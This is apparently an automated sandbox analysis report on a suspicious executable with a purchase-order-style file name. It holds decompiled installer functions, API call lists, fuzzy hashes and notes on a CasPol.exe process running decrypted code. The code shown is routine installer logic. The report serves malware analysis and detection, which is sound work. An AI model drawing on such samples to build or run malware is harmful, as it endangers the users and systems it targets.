Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 1b6a587a400701eabc8229d3e3b69e73e671933e3945777b2463f190b987498e
Instruction ID: 43aedd9bd01b98b6f78ee00b952d30abd1abf30aba01f835b52ba634ff97d244
Opcode Fuzzy Hash: 1b6a587a400701eabc8229d3e3b69e73e671933e3945777b2463f190b987498e
Instruction Fuzzy Hash: 1AF05E30516A22EBC6916B14FF4DE8B7B64AB80B1171684BBF051B11E4CA7C0C82CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00403B51 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B51(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = L"1033";
				_t13 = 0xffff;
				_t6 = E00405F92(__ecx, L"1033");
				while(1) {
					_t26 =  *0x7a8a84;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x7a8a50 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x7a8a80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x7a7a20 = _t18[1];
					 *0x7a8ae8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x7a7a1c = _t23;
						E00405F79(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextW( *0x7a1f20, E00406054(_t13, _t24, _t26, "Overcaustically Setup", 0xfffffffe));
						_t11 =  *0x7a8a6c;
						_t27 =  *0x7a8a68;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00406054(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x818;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403b55
0x00403b5a
0x00403b60
0x00403b65
0x00403b65
0x00403b6d
0x00000000
0x00000000
0x00403b75
0x00403b7d
0x00403b7f
0x00403b85
0x00403b85
0x00403b87
0x00403b93
0x00000000
0x00000000
0x00403b97
0x00000000
0x00000000
0x00000000
0x00403b99
0x00403b9e
0x00403ba7
0x00403bad
0x00403bb2
0x00403bc6
0x00403bd1
0x00403be9
0x00403bef
0x00403bf4
0x00403bfc
0x00403c1d
0x00403c1d
0x00403c1d
0x00403bfe
0x00403c00
0x00403c00
0x00403c04
0x00403c0b
0x00403c0b
0x00403c10
0x00403c16
0x00403c16
0x00000000
0x00403c00
0x00403bb4
0x00403bb9
0x00403bc2
0x00403bbb
0x00403bbb
0x00403bbb
0x00403bb9

APIs

SetWindowTextW.USER32(00000000,Overcaustically Setup), ref: 00403BE9

Strings

Overcaustically Setup, xrefs: 00403BD8
1033, xrefs: 00403B55, 00403B5F, 00403BD0

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: TextWindow
String ID: 1033$Overcaustically Setup
API String ID: 530164218-3667396766
Opcode ID: 73e21ad5ffa932d89d7705433f4a385169624a21009188ee896e041d0e727551
Instruction ID: e987bbb99f4ce20eb3fe8b814340f1a9c458372fd2df2122c6df2ee7e0325558
Opcode Fuzzy Hash: 73e21ad5ffa932d89d7705433f4a385169624a21009188ee896e041d0e727551
Instruction Fuzzy Hash: 1D11D132B046109BC724DF15DC80A7777BCEBC6719728C17BE901A73A2DA3DAE018799

Uniqueness

Uniqueness Score: -1.00%

Function 00405105 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405105(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f2c != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f2c = _t16;
							E00404ADB();
						}
						L11:
						return CallWindowProcW( *0x7a1f34, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404A5B(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404142(0x413);
				return 0;
			}

0x00405109
0x00405113
0x0040512f
0x00405151
0x00405154
0x0040515a
0x00405164
0x00405165
0x00405167
0x0040516d
0x0040516d
0x00405177
0x00000000
0x00405185
0x0040513c
0x00405174
0x00405174
0x00000000
0x00405174
0x00405148
0x0040514a
0x00000000
0x0040514a
0x00405119
0x00000000
0x00000000
0x00405120
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405134
CallWindowProcW.USER32(?,?,?,?), ref: 00405185

Part of subcall function 00404142: SendMessageW.USER32(0001043C,00000000,00000000,00000000), ref: 00404154

Strings

, xrefs: 00405115

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 555dd6184ff58a02eec7ea7395712ea6493033a95aca245b2aa61cc483e9b19e
Instruction ID: dd95526c2c69af2e2475994b1a4b7019860870cbffabe27cf4c45e442f77114e
Opcode Fuzzy Hash: 555dd6184ff58a02eec7ea7395712ea6493033a95aca245b2aa61cc483e9b19e
Instruction Fuzzy Hash: 80015A7190060CAFEF219F25DD80FAB3A26EB85354F108136FA047E2D1C77A8C919E6D

Uniqueness

Uniqueness Score: -1.00%

Function 004037E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004037E6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79ff04; // 0x9c75c8
				_t3 = E004037CB(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						_t1 = _t6 + 8; // 0x10000000
						FreeLibrary( *_t1);
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79ff04 =  *0x79ff04 & 0x00000000;
				return _t3;
			}

0x004037e7
0x004037ef
0x004037f6
0x004037f9
0x004037f9
0x004037fb
0x004037fd
0x00403800
0x00403807
0x0040380d
0x00403811
0x00403812
0x0040381a

APIs

FreeLibrary.KERNEL32(10000000,762E3420,00000000,C:\Users\user\AppData\Local\Temp\,004037BE,004035D3,?), ref: 00403800
GlobalFree.KERNEL32(009C75C8), ref: 00403807

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004037E6

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: cd6be415db01051891a2bbdb2ac2360d1775ad133b1b133e2abe0c5c00c63f81
Instruction ID: 7b5e820bad8908d6e9c5a6129ef56ed4de620d6e951f9557df5b5d2d3b1225d2
Opcode Fuzzy Hash: cd6be415db01051891a2bbdb2ac2360d1775ad133b1b133e2abe0c5c00c63f81
Instruction Fuzzy Hash: 90E08C334115205BC6211F14AA04B2A76BC6F49F22F19802FF880BB2608B781C424AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405A32(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405a33
0x00405a3d
0x00405a40
0x00405a46
0x00405a47
0x00405a48
0x00405a50
0x00000000
0x00000000
0x00000000
0x00405a50
0x00405a52
0x00405a5a

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405A38
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405A48

Strings

C:\Users\user\Desktop, xrefs: 00405A32

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction ID: 324b1dc390856c450e544e32c4aad69d139446a74aa4c59c68e3560d72017bd2
Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction Fuzzy Hash: 1FD05EB2400D209AD322A704DC44EAF63A8FF51300786886AF941A61A1D7785C818EA9

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405B6C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B6C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405b7c
0x00405b7e
0x00405b81
0x00405bad
0x00405b86
0x00405b8f
0x00405b94
0x00405b9f
0x00405ba2
0x00405bbe
0x00405ba4
0x00405bab
0x00000000
0x00405bab
0x00405bb7
0x00405bbb
0x00405bbb
0x00405bb5
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B7C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B94
CharNextA.USER32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA5
lstrlenA.KERNEL32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BAE

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction ID: 7563504597b604d9a211119aa68f0a7f164f23f923bb21cff999b965ed3bd4a6
Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction Fuzzy Hash: DCF0C231105818AFD7029FA5DD0099FBBB8EF55250B2540A9E840F7210D674FE019B68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 6756, Parent PID: 408COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	99.1%
Signature Coverage:	0%
Total number of Nodes:	219
Total number of Limit Nodes:	23

Executed Functions

Function 1D30A2CF Relevance: 6.2, APIs: 4, Instructions: 153
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 1D30A386
GetCurrentThread.KERNEL32 ref: 1D30A3C3
GetCurrentProcess.KERNEL32 ref: 1D30A400
GetCurrentThreadId.KERNEL32 ref: 1D30A459

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f389441897519260900e5c26437d77f005181a7c3faee7ac8f4f089103e05567
Instruction ID: 47ee5b6bd53eba64ca0f853f01991a425fd093d25e91112fb7d6b8ac0422c990
Opcode Fuzzy Hash: f389441897519260900e5c26437d77f005181a7c3faee7ac8f4f089103e05567
Instruction Fuzzy Hash: 8161BCB08053498FDB04CFA9D848BEEBFF0AF49314F2486AAD00AA7351D7359945CF62

Uniqueness

Uniqueness Score: -1.00%

Function 1D30A308 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 1D30A386
GetCurrentThread.KERNEL32 ref: 1D30A3C3
GetCurrentProcess.KERNEL32 ref: 1D30A400
GetCurrentThreadId.KERNEL32 ref: 1D30A459

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 50be025c03efa11d2ea283c9ac607842d2247ba2508d050a7887cf436bbfc1a7
Instruction ID: d0a18480fab19f0b907e62e4d4901eb45ab77cf222cb11717f0b131b6b634f63
Opcode Fuzzy Hash: 50be025c03efa11d2ea283c9ac607842d2247ba2508d050a7887cf436bbfc1a7
Instruction Fuzzy Hash: 2A519CB0D002498FDB04CFA9D548BAEFBF0AF89304F24866DD41AA7750DB35A945CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0137BAA0 Relevance: 2.0, APIs: 1, Instructions: 509
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0137C007

Memory Dump Source

Source File: 00000097.00000002.67424855364.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b221f76b3bf354b867a59660d1ce24f2b348395bde756fb2366939cda83626f
Instruction ID: e1e00694d97916a8b7952f2186c74e04abdebe67e9d971b16ef7603dd70ec448
Opcode Fuzzy Hash: 8b221f76b3bf354b867a59660d1ce24f2b348395bde756fb2366939cda83626f
Instruction Fuzzy Hash: 0D12B030A042048FCB25DBB4D498AAEBBF2AF85308F15C879D515DB395DB35EC06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D304FE0 Relevance: 1.8, APIs: 1, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1D3053B6

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4c58e9f7ca508c673a034d63b51ecea73d40d553caaea61be04d6d58b8789c70
Instruction ID: 90fdddbef4c13e1c4440018ba5ee5b7c3c5ce82e04a042001b2fc044c337e214
Opcode Fuzzy Hash: 4c58e9f7ca508c673a034d63b51ecea73d40d553caaea61be04d6d58b8789c70
Instruction Fuzzy Hash: DBB18D74A047058FDB08DF79C480A6EBBF5BF88214B118A2DC91ADB751DB34ED45CB92

Uniqueness

Uniqueness Score: -1.00%

